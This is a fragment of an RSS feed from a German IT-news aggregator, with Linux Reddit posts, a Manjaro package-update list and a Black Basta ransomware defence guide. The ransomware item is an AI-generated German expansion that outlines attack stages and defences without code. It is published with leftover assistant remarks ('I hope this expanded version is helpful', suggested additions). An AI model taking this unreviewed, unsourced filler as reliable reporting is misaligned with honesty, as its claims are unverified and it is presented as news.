<guid isPermaLink="true">https://tsecurity.de/de/2934374/linux-tipps/why-i-run-lts-kernel-and-firefox-esr-what-are-your-lts-picks/</guid>
<pubDate>Mon, 11 Aug 2025 22:21:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>lts-kernel: <a href="https://www.phoronix.com/news/Btrfs-Log-Tree-Corruption-Fix">https://www.phoronix.com/news/Btrfs-Log-Tree-Corruption-Fix</a></p> <p>firefox-esr: <a href="https://www.ghacks.net/2025/07/22/firefox-141-introduces-local-ai-to-help-with-tab-management/">https://www.ghacks.net/2025/07/22/firefox-141-introduces-local-ai-to-help-with-tab-management/</a></p> <p>.. and there's endless more examples .. </p> <p>Stable is not stable enough. I enjoy the latest packages of other software - but these 2 are too critical to my workflow to be a nuisance in daily life.</p> <p>I enjoy other latest packages: rclone, fd, eza..</p> <p>I built some packages from src as well like vim</p> <p>Do you have other packages you often stay on oldstable/lts release for well-argued reasons?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Some_Cod_47"> /u/Some_Cod_47 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1mnno9x/why_i_run_ltskernel_and_firefoxesr_what_are_your/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1mnno9x/why_i_run_ltskernel_and_firefoxesr_what_are_your/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I'm Going Back to Windows 🥲]]></title>
<description><![CDATA[I've been daily driving Linux for about 2 months and I'm finally ready to admit that the software ecosystem is still a major problem in 2025. Don't get me wrong - I love the customization, the performance, the privacy aspects, and the general philosophy. But I'm tired of living in a world of work...]]></description>
<link>https://tsecurity.de/de/2890763/linux-tipps/why-im-going-back-to-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2890763/linux-tipps/why-im-going-back-to-windows/</guid>
<pubDate>Wed, 16 Jul 2025 18:36:37 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I've been daily driving Linux for about 2 months and I'm finally ready to admit that the software ecosystem is still a major problem in 2025.</p> <p>Don't get me wrong - I love the customization, the performance, the privacy aspects, and the general philosophy. But I'm tired of living in a world of workarounds and "gud enough" alternatives.</p> <p>WhatsApp Desktop: Still no official support. Yeah, I know about WhatsApp Web and third-party clients, but they're janky and missing features. WhatsApp Web doesn't even support calling - a basic feature that works fine in the mobile app and desktop apps on other platforms. Why should I have to use a browser tab for something that has a proper desktop app everywhere else?</p> <p>Google Drive: The web interface is painful for anything beyond basic file management. No proper sync client that actually works reliably. I've tried rclone, and others - they all have issues. insync (haven't tried) is paid. Meanwhile they have proper app for Windows and macOS.</p> <p>Netflix and other streaming: I'm getting 4K Netflix subscription (included with my ISP plan), but I'm stuck at 720p because of DRM limitations on Linux. Meanwhile, the Edge on Windows and Safari on macOS gets full 4K. It's 2025 and I can't watch shows in the resolution I'm paying for because of arbitrary platform restrictions. i know can get that extension to watch at 1080p but still there is a huge difference in both.</p> <p>Apple Music/ Apple Tv:Completely locked out. The web player is trash compared to the native apps. I pay for the service, but I can't actually use it properly on my OS of choice. I use Apple Music because i pay for Apple One and i get Apple Music, Apple TV and iCloud storage but none of these apps are available on Linux while all these apps are available on Windows and Android.</p> <p>MS Office vs LibreOffice: LibreOffice is NOT a replacement for Office. The UI is from 2005, compatibility is hit-or-miss, and collaborative features do not even exists. I've tried OnlyOffice too - better, but still not there.</p> <p>This isn't really Linux's fault. The kernel and desktop environments are solid. The problem is that these big companies just don't care about the Linux desktop market share enough to port their apps. Adobe, Google, Apple, Microsoft - they could absolutely make native Linux versions if they wanted to. They just don't care.</p> <p>The software gap is still real, and pretending it doesn't exist isn't helping anyone.</p> <p>also My laptop's fingerprint reader doesn't work, laptop not going to sleep mode sometimes and i only get 4 hrs battery backup on Linux while 8-9 hrs battery on Windows despite all bloat and spyware running in the background on Windows.</p> <p>I want to love Linux and I do love parts of it. but I'm tired of spending more time configuring my OS than actually using it. Maybe I'll try linux again in a few years. untill then goodbye.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/sleepyguyBHR"> /u/sleepyguyBHR </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1m1heha/why_im_going_back_to_windows/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1m1heha/why_im_going_back_to_windows/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Zwei Probleme in rclone (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/2889344/it-security-nachrichten/zwei-probleme-in-rclone-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889344/it-security-nachrichten/zwei-probleme-in-rclone-fedora/</guid>
<pubDate>Wed, 16 Jul 2025 09:48:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[easyclone - Very convenient Rclone bulk backup wrapper]]></title>
<description><![CDATA[submitted by    /u/forvirringssirkel   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/2870862/linux-tipps/easyclone-very-convenient-rclone-bulk-backup-wrapper/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2870862/linux-tipps/easyclone-very-convenient-rclone-bulk-backup-wrapper/</guid>
<pubDate>Sun, 06 Jul 2025 23:51:27 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/forvirringssirkel"> /u/forvirringssirkel </a> <br> <span><a href="https://github.com/dybdeskarphet/easyclone">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ltbri3/easyclone_very_convenient_rclone_bulk_backup/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2025-06-20 - Kernels, Mesa, Steam, OpenGamepadUI, ZFS]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Find out all about our current Gaming Laptop the Hero with Manjaro pre-installed from Spain!
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

Development | Q&A |...]]></description>
<link>https://tsecurity.de/de/2841774/unix-server/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2841774/unix-server/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/</guid>
<pubDate>Fri, 20 Jun 2025 09:49:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-783138-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-783138-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Find out all about our current <strong>Gaming Laptop</strong> the <a href="https://hero.manjaro.org/">Hero</a> with Manjaro pre-installed from Spain!</li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-783138-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-783138-recent-news-2"></a>Recent News</h2>
<ul>
<li><a href="https://forum.manjaro.org/t/development-q-a-zotac-gaming-zone/177928" class="inline-onebox">Development | Q&amp;A | Zotac Gaming ZONE</a></li>
<li><a href="https://forum.manjaro.org/t/development-q-a-orangepi-neo-01/156450" class="inline-onebox">Development | Q&amp;A | OrangePi Neo-01</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-25-0-zetar-released/177008" class="inline-onebox">Manjaro 25.0 Zetar released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 6.14.11, the 6.14 series is now EOL (End Of Life). Please install 6.15 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010/1">(click for more details)</a>
<h2><a name="p-783138-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-783138-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated
<ul>
<li><strong>linux614</strong> got dropped from the repos</li>
</ul>
</li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.1.4.html">25.1.4</a></li>
<li><strong>Steam</strong> <a href="https://github.com/ValveSoftware/steam-for-linux">1.0.0.83</a></li>
<li><strong>OpenGamepadUI</strong> <a href="https://github.com/ShadowBlip/OpenGamepadUI/releases/tag/v0.40.0">0.40.0</a></li>
<li><strong>Powerstation</strong> <a href="https://github.com/ShadowBlip/PowerStation/releases/tag/v0.6.1">0.6.1</a></li>
<li><strong>Inputplumber</strong> <a href="https://github.com/ShadowBlip/InputPlumber/releases/tag/v0.58.7">0.58.7</a></li>
<li><strong>ZFS</strong> <a href="https://www.phoronix.com/news/OpenZFS-2.3.3">2.3.3</a></li>
</ul>
<h2><a name="p-783138-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-783138-additional-info-4"></a>Additional Info</h2>

Python 3.13 info <a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<h2><a name="p-783138-our-current-supported-kernels-5" class="anchor" href="https://forum.manjaro.org/#p-783138-our-current-supported-kernels-5"></a>Our current supported kernels</h2>
<ul>
<li>linux54 5.4.295</li>
<li>linux510 5.10.237</li>
<li>linux515 5.15.185</li>
<li>linux61 6.1.141</li>
<li>linux66 6.6.93</li>
<li>linux612 6.12.33</li>
<li>linux615 6.15.2</li>
<li>linux616 6.16.0-rc2</li>
<li>linux61-rt 6.1.134_rt51</li>
<li>linux66-rt 6.6.87_rt54</li>
<li>linux612-rt 6.12.28_rt10</li>
<li>linux613-rt 6.13_rt5</li>
<li>linux614-rt 6.14.0_rt3</li>
<li>linux615-rt 6.15.0_rt2</li>
</ul>
<p><strong>Package Changes</strong> (Fri Jun 20 09:13:26 CEST 2025)</p>
<ul>
<li>testing core x86_64:  13 new and 15 removed package(s)</li>
<li>testing extra x86_64:  140 new and 152 removed package(s)</li>
<li>testing multilib x86_64:  13 new and 13 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                  linux-headers-meta               6.14-1               6.15-1
                          linux-meta               6.14-1               6.15-1
                          linux61-rt       6.1.134_rt51-2       6.1.141_rt52-1
                  linux61-rt-headers       6.1.134_rt51-2       6.1.141_rt52-1
                            linux612            6.12.33-1            6.12.34-1
                    linux612-headers            6.12.33-1            6.12.34-1
                            linux614            6.14.11-1                    -
                    linux614-headers            6.14.11-1                    -
                            linux615             6.15.2-2             6.15.3-1
                    linux615-headers             6.15.2-2             6.15.3-1
                             linux66             6.6.93-1             6.6.94-1
                     linux66-headers             6.6.93-1             6.6.94-1
                          linux66-rt        6.6.87_rt54-2        6.6.93_rt55-1
                  linux66-rt-headers        6.6.87_rt54-2        6.6.93_rt55-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                          libnghttp2             1.65.0-1             1.66.0-1


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                    inputplumber-git 0.58.6.r1.g6927752-1 0.58.7.r0.g33fb129-1
                linux-acpi_call-meta               6.14-1               6.15-1
                 linux-bbswitch-meta               6.14-1               6.15-1
              linux-broadcom-wl-meta               6.14-1               6.15-1
             linux-nvidia-390xx-meta               6.14-1               6.15-1
             linux-nvidia-470xx-meta               6.14-1               6.15-1
                   linux-nvidia-meta               6.14-1               6.15-1
              linux-nvidia-open-meta               6.14-1               6.15-1
                    linux-r8168-meta               6.14-1               6.15-1
                linux-rtl8723bu-meta               6.14-1               6.15-1
                 linux-tp_smapi-meta               6.14-1               6.15-1
              linux-vhba-module-meta               6.14-1               6.15-1
  linux-virtualbox-host-modules-meta               6.14-1               6.15-1
                      linux-zfs-meta               6.14-1               6.15-1
                        linux510-zfs              2.3.2-1              2.3.3-1
                        linux515-zfs              2.3.2-5              2.3.3-1
                         linux54-zfs              2.3.2-2              2.3.3-1
                linux61-rt-acpi_call             1.2.2-45             1.2.2-46
                 linux61-rt-bbswitch               0.8-44               0.8-45
              linux61-rt-broadcom-wl      6.30.223.271-44      6.30.223.271-45
             linux61-rt-nvidia-390xx           390.157-44           390.157-45
             linux61-rt-nvidia-470xx        470.256.02-23        470.256.02-24
                   linux61-rt-nvidia             575.64-1             575.64-2
              linux61-rt-nvidia-open             575.64-1             575.64-2
                    linux61-rt-r8168           8.055.00-6           8.055.00-7
                linux61-rt-rtl8723bu          20240303-27          20240303-28
                 linux61-rt-tp_smapi              0.44-38              0.44-39
              linux61-rt-vhba-module           20250329-3           20250329-4
  linux61-rt-virtualbox-host-modules             7.1.10-1             7.1.10-2
                         linux61-zfs              2.3.2-6              2.3.3-1
                  linux612-acpi_call             1.2.2-56             1.2.2-57
                   linux612-bbswitch               0.8-54               0.8-55
                linux612-broadcom-wl      6.30.223.271-55      6.30.223.271-56
               linux612-nvidia-390xx           390.157-56           390.157-57
               linux612-nvidia-470xx        470.256.02-56        470.256.02-57
                     linux612-nvidia             575.64-1             575.64-2
                linux612-nvidia-open             575.64-1             575.64-2
                      linux612-r8168          8.055.00-34          8.055.00-35
                  linux612-rtl8723bu          20240303-55          20240303-56
                   linux612-tp_smapi              0.44-54              0.44-55
                linux612-vhba-module          20250329-17          20250329-18
    linux612-virtualbox-host-modules             7.1.10-3             7.1.10-4
                        linux612-zfs              2.3.2-8              2.3.3-1
                  linux614-acpi_call             1.2.2-24                    -
                   linux614-bbswitch               0.8-24                    -
                linux614-broadcom-wl      6.30.223.271-24                    -
               linux614-nvidia-390xx           390.157-23                    -
               linux614-nvidia-470xx        470.256.02-23                    -
                     linux614-nvidia             575.64-1                    -
                linux614-nvidia-open             575.64-1                    -
                      linux614-r8168          8.055.00-24                    -
                  linux614-rtl8723bu          20240303-24                    -
                   linux614-tp_smapi              0.44-24                    -
                linux614-vhba-module          20250329-22                    -
    linux614-virtualbox-host-modules             7.1.10-3                    -
                        linux614-zfs             2.3.2-11                    -
                  linux615-acpi_call              1.2.2-4              1.2.2-5
                   linux615-bbswitch                0.8-4                0.8-5
                linux615-broadcom-wl       6.30.223.271-3       6.30.223.271-4
               linux615-nvidia-390xx            390.157-4            390.157-5
               linux615-nvidia-470xx         470.256.02-4         470.256.02-5
                     linux615-nvidia             575.64-1             575.64-2
                linux615-nvidia-open             575.64-1             575.64-2
                      linux615-r8168           8.055.00-4           8.055.00-5
                  linux615-rtl8723bu           20240303-3           20240303-4
                   linux615-tp_smapi               0.44-4               0.44-5
                linux615-vhba-module           20250329-4           20250329-5
    linux615-virtualbox-host-modules             7.1.10-4             7.1.10-5
                   linux66-acpi_call            1.2.2-133            1.2.2-134
                    linux66-bbswitch              0.8-130              0.8-131
                 linux66-broadcom-wl     6.30.223.271-131     6.30.223.271-132
                linux66-nvidia-390xx          390.157-128          390.157-129
                linux66-nvidia-470xx        470.256.02-71        470.256.02-72
                      linux66-nvidia             575.64-1             575.64-2
                 linux66-nvidia-open             575.64-1             575.64-2
                       linux66-r8168          8.055.00-22          8.055.00-23
                linux66-rt-acpi_call             1.2.2-39             1.2.2-40
                 linux66-rt-bbswitch               0.8-38               0.8-39
              linux66-rt-broadcom-wl      6.30.223.271-39      6.30.223.271-40
             linux66-rt-nvidia-390xx           390.157-38           390.157-39
             linux66-rt-nvidia-470xx        470.256.02-27        470.256.02-28
                   linux66-rt-nvidia             575.64-1             575.64-2
              linux66-rt-nvidia-open             575.64-1             575.64-2
                    linux66-rt-r8168           8.055.00-9          8.055.00-10
                linux66-rt-rtl8723bu          20240303-31          20240303-32
                 linux66-rt-tp_smapi              0.44-13              0.44-14
              linux66-rt-vhba-module           20250329-3           20250329-4
  linux66-rt-virtualbox-host-modules             7.1.10-1             7.1.10-2
                   linux66-rtl8723bu          20240303-87          20240303-88
                    linux66-tp_smapi             0.44-130             0.44-131
                 linux66-vhba-module           20250329-9          20250329-10
     linux66-virtualbox-host-modules             7.1.10-2             7.1.10-3
                         linux66-zfs              2.3.2-5              2.3.3-1
                   opengamepadui-git0.39.2.r0.g5109fba7-20.40.0.r0.gb70cf77f-1
                    powerstation-bin             v0.6.0-1             v0.6.1-1
                    powerstation-git v0.6.0.r0.gb5981fd-1 v0.6.1.r0.gb1928ba-1
                            zfs-dkms              2.3.2-1              2.3.3-1
                           zfs-utils              2.3.2-1              2.3.3-1
                        linux615-zfs                    -              2.3.3-1


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                          abseil-cpp         20250512.0-1         20250512.1-1
                       docker-buildx             0.24.0-1             0.25.0-1
                             freetds              1.5.2-1              1.5.3-1
                               fwupd             2.0.11-2             2.0.12-1
                          fwupd-docs             2.0.11-2             2.0.12-1
                                giac            2.0.0.3-1            2.0.0.4-1
                                glab             1.60.1-1             1.60.2-1
                               gopls             0.19.0-1             0.19.1-1
                        inputplumber             0.58.6-1             0.58.7-1
                         kube-linter              0.7.3-1              0.7.4-1
                   libblastrampoline             5.13.0-1             5.13.1-1
                             libzypp            17.37.5-1            17.37.6-1
                        libzypp-docs            17.37.5-1            17.37.6-1
                                mesa           1:25.1.3-3           1:25.1.4-1
                           mesa-docs           1:25.1.3-3           1:25.1.4-1
                    mkinitcpio-utils              0.0.4-2              0.0.5-1
                                nccl             2.27.3-1             2.27.5-1
                         opencl-mesa           1:25.1.3-3           1:25.1.4-1
                                orca               48.2-1               48.3-1
                             osbuild                151-1                152-1
                         osv-scanner              2.0.2-1              2.0.3-1
                 oxc-language-server              1.1.0-1              1.2.0-1
                              oxlint              1.1.0-1              1.2.0-1
                  proton-vpn-gtk-app              4.9.6-1              4.9.7-1
                   protonmail-bridge             3.20.0-3             3.21.1-1
              protonmail-bridge-core             3.20.0-3             3.21.1-1
                       python-cattrs             25.1.1-1             25.1.1-2
                    python-fakeredis             2.30.0-1             2.30.1-1
          python-proton-vpn-api-core             0.42.4-1             0.42.5-1
                      python-pytorch              2.7.1-2              2.7.1-3
                 python-pytorch-cuda              2.7.1-2              2.7.1-3
                  python-pytorch-opt              2.7.1-2              2.7.1-3
             python-pytorch-opt-cuda              2.7.1-2              2.7.1-3
             python-pytorch-opt-rocm              2.7.1-2              2.7.1-3
                 python-pytorch-rocm              2.7.1-2              2.7.1-3
                              rclone             1.70.0-1             1.70.1-1
                              reaper               7.39-1               7.40-1
                         release-plz            0.3.135-1            0.3.136-1
                          ruby-iconv              1.1.0-3              1.1.0-4
                           ruby-mail              2.8.1-5              2.8.1-7
                ruby-mime-types-data        3.2025.0603-1        3.2025.0617-1
                         ruby-rbtree              0.4.6-6              0.4.6-7
                      ruby-rdiscount            2.2.7.3-6            2.2.7.3-7
                          vulkan-dzn           1:25.1.3-3           1:25.1.4-1
                    vulkan-gfxstream           1:25.1.3-3           1:25.1.4-1
                        vulkan-intel           1:25.1.3-3           1:25.1.4-1
                  vulkan-mesa-layers           1:25.1.3-3           1:25.1.4-1
                      vulkan-nouveau           1:25.1.3-3           1:25.1.4-1
                       vulkan-radeon           1:25.1.3-3           1:25.1.4-1
                       vulkan-swrast           1:25.1.3-3           1:25.1.4-1
                       vulkan-virtio           1:25.1.3-3           1:25.1.4-1
                              wasmer              6.0.0-1              6.0.1-1
                                 zed            0.191.5-1            0.191.6-1
                              zypper            1.14.90-1            1.14.91-1


:: Different overlay package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                               steam           1.0.0.82-3           1.0.0.83-1
                     steam-installer           1.0.0.82-3           1.0.0.83-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE             20250619             20250620
-------------------------------------------------------------------------------
                    lib32-libnghttp2             1.65.0-1             1.66.0-1
                          lib32-mesa           1:25.1.3-3           1:25.1.4-1
                   lib32-opencl-mesa           1:25.1.3-3           1:25.1.4-1
                    lib32-vulkan-dzn           1:25.1.3-3           1:25.1.4-1
              lib32-vulkan-gfxstream           1:25.1.3-3           1:25.1.4-1
                  lib32-vulkan-intel           1:25.1.3-3           1:25.1.4-1
            lib32-vulkan-mesa-layers           1:25.1.3-3           1:25.1.4-1
                lib32-vulkan-nouveau           1:25.1.3-3           1:25.1.4-1
                 lib32-vulkan-radeon           1:25.1.3-3           1:25.1.4-1
                 lib32-vulkan-swrast           1:25.1.3-3           1:25.1.4-1
                 lib32-vulkan-virtio           1:25.1.3-3           1:25.1.4-1

</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2025-06-20-kernels-mesa-steam-opengamepadui-zfs/179010">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Black Basta Ransomware: Protection, Prevention, and Recovery Guide]]></title>
<description><![CDATA[Learn how to stay safe from Black Basta ransomware group with advice on how to spot, prevent, and recover from attacks. Understand how these attacks work, explore real-life examples, and discover strategies to protect against ransomware.KI generiertes Nachrichten Update---

Hier ist eine erweiter...]]></description>
<link>https://tsecurity.de/de/2735749/it-security-nachrichten/black-basta-ransomware-protection-prevention-and-recovery-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2735749/it-security-nachrichten/black-basta-ransomware-protection-prevention-and-recovery-guide/</guid>
<pubDate>Tue, 22 Apr 2025 08:05:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn how to stay safe from Black Basta ransomware group with advice on how to spot, prevent, and recover from attacks. Understand how these attacks work, explore real-life examples, and discover strategies to protect against ransomware.<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>---

Hier ist eine erweiterte Version des Nachrichtenartikels, die auf den bereitgestellten Informationen basiert und zusätzliche Details enthält, um das Thema Black Basta Ransomware umfassender zu behandeln.

**Black Basta Ransomware: Ein umfassender Leitfaden zum Schutz, zur Prävention und zur Wiederherstellung**

Die Black Basta Ransomware stellt eine erhebliche Bedrohung für Unternehmen und Einzelpersonen weltweit dar. Seit ihrem Auftauchen im April 2022 hat diese Ransomware-Gruppe, die das Ransomware-as-a-Service (RaaS) Modell verwendet, Hunderte von Organisationen ins Visier genommen. Dieser Artikel bietet einen detaillierten Leitfaden zum Verständnis, zur Abwehr und zur Bewältigung von Black Basta Ransomware.

**Was ist Black Basta Ransomware?**

Black Basta ist ein RaaS-Betrieb, der sich durch die Kombination aus Datenverschlüsselung und Datenexfiltration auszeichnet (Double Extortion).  Die Gruppe betreibt eine Dark-Web-Leak-Website ("Basta News"), auf der gestohlene Daten veröffentlicht werden, wenn die Opfer nicht zahlen. Die Ähnlichkeit zu früheren Ransomware-Gruppen wie Conti deutet auf eine mögliche Verbindung oder einen Nachfolger hin, was die Bedrohung noch gravierender macht.

Black Basta zielt auf eine Vielzahl von Plattformen ab, darunter Windows, Linux und VMware ESXi-Server. Die betroffenen Dateien werden mit der Erweiterung ".basta" versehen, und die Opfer erhalten eine Ransom-Notiz ("readme.txt"), die Anweisungen zur Kontaktaufnahme mit den Angreifern über eine Tor-Site enthält.

**Wie funktioniert Black Basta Ransomware?**

Der Angriff läuft in mehreren Phasen ab:

1.  **Initialer Zugriff:** Die Angreifer dringen über Phishing-E-Mails oder die Ausnutzung bekannter Schwachstellen (z.B. ZeroLogon, NoPac) in das Netzwerk ein.
2.  **Recherche und Bewegung:** Nach dem Zugriff führen sie eine Netzwerkaufklärung durch und bewegen sich lateral, um weitere Systeme zu kompromittieren. Werkzeuge wie Cobalt Strike und PSExec werden häufig eingesetzt.
3.  **Privilegieneskalation:** Mithilfe von Credential-Dumping-Tools wie Mimikatz erlangen sie administrative Rechte.
4.  **Datenexfiltration:** Bevor die Verschlüsselung beginnt, exfiltrieren sie Daten mithilfe von Tools wie Rclone oder WinSCP auf Cloud-Speicherdienste.
5.  **Verschlüsselung:** Die Verschlüsselung erfolgt in der Regel im abgesicherten Modus, um Sicherheitsmaßnahmen zu umgehen. Black Basta verwendet eine Hybrid-Verschlüsselung mit ChaCha20 und RSA-4096.
6.  **Ransomware-Note:** Eine Ransom-Note wird hinterlassen, oft in Form eines Desktop-Wallpaper, das die Opfer zur Zahlung auffordert.

**Wie erkennt man Black Basta Ransomware?**

*   **Ungewöhnliche Dateierweiterungen:** Dateien mit der Erweiterung ".basta" oder temporäre Dateien, die in ".basta" umgewandelt werden.
*   **Systemverlangsamungen:**  Hohe Festplattenaktivität während der Verschlüsselung.
*   **Deaktivierung von Sicherheitstools:** Unerwartetes Ausschalten von EDR- und Antivirenprogrammen.
*   **Verdächtige Netzwerkaktivität:** Ungewöhnlicher ausgehender Datenverkehr zu Tor-Knoten oder unbekannten IP-Adressen.
*   **Absicherter Modus oder Wallpaper-Änderungen:**  Ein System startet ohne Benutzerinteraktion im abgesicherten Modus neu, oder das Desktop-Hintergrundbild ändert sich.

**Wie kann man Black Basta Ransomware verhindern?**

*   **System-Patches:** Regelmäßige Aktualisierung von Betriebssystemen, Software und Firmware.
*   **Starke Authentifizierung:** Implementierung der Multi-Faktor-Authentifizierung (MFA) für alle Remote-Zugänge und Administratorkonten.
*   **Mitarbeiterschulung:** Sensibilisierung der Mitarbeiter für Phishing-E-Mails und andere Social-Engineering-Angriffe.
*   **Endpoint-Protection und Netzwerkverteidigung:** Einsatz von Antiviren-, EDR-Lösungen und Data Exfiltration Protection.
*   **Datensicherung:** Regelmäßige Offline-Backups gemäß der 3-2-1-Backup-Regel.

**Was tun, wenn man von Black Basta Ransomware befallen ist?**

1.  **Isolierung:** Sofortige Trennung infizierter Systeme vom Netzwerk.
2.  **Eindämmung:** Sperren von Konten und Stoppen bösartiger Prozesse.
3.  **Benachrichtigung:** Informieren des Incident-Response-Teams, der Führungsebene, Cybersecurity-Versicherungen und gegebenenfalls Strafverfolgungsbehörden.
4.  **Wiederherstellung:**  Datenwiederherstellung aus Backups, sofern verfügbar.

**Zukunftsperspektiven und Fazit**

Die Black Basta Ransomware stellt eine kontinuierliche Bedrohung dar, und es ist wahrscheinlich, dass sich die Taktiken und Methoden der Angreifer weiterentwickeln werden.  Die Implementierung robuster Sicherheitsmaßnahmen, die kontinuierliche Überwachung und die Vorbereitung auf Notfallsituationen sind entscheidend, um sich gegen Black Basta und andere Ransomware-Bedrohungen zu schützen.  Die Investition in proaktiven Schutz, Mitarbeiterschulung und eine solide Wiederherstellungsstrategie ist unerlässlich, um das Risiko zu minimieren und im Falle eines Angriffs schnell und effektiv reagieren zu können.
---

**Zusätzliche Punkte, die je nach Bedarf hinzugefügt werden könnten:**

*   **Technische Details:**  Eine detailliertere Beschreibung der Verschlüsselungsalgorithmen und der verwendeten Tools.
*   **Rechtliche Aspekte:**  Diskussion über die rechtlichen Konsequenzen einer Ransomware-Attacke und die Meldepflichten.
*   **Versicherungsaspekte:**  Erklärung, welche Arten von Schäden durch Cyberversicherungen abgedeckt werden können.
*   **Fallstudien:**  Detailliertere Analysen konkreter Black Basta Ransomware-Attacken.
*   **Zusätzliche Ressourcen:** Links zu weiteren Informationen und Tools zur Prävention und Wiederherstellung.
*   **BlackFog Lösungen:**  Erwähnung der BlackFog-Lösungen als zusätzliche Schutzschicht.

Ich hoffe, diese erweiterte Version des Artikels ist hilfreich.<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[using a mini-pc as small home-server (using Tailscale, etc.)]]></title>
<description><![CDATA[I have recently moved some of my cloud-service on a small mini-pc and have documented most of my steps through this blog post. Basically, I am using a mini-pc with a nvme as server, connect it to the internet over a protonVPN privacy-VPN, use tailscale as an overlay network, use docker-compose fo...]]></description>
<link>https://tsecurity.de/de/2718857/linux-tipps/using-a-mini-pc-as-small-home-server-using-tailscale-etc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2718857/linux-tipps/using-a-mini-pc-as-small-home-server-using-tailscale-etc/</guid>
<pubDate>Fri, 11 Apr 2025 11:36:09 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
